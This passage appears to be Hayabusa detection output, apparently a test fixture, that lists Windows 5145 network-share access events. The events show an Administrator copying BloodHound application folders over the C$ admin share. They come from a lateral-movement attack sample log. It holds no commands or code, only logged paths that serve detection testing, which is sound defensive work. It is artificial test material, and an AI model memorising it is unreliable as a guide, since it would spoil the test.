+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
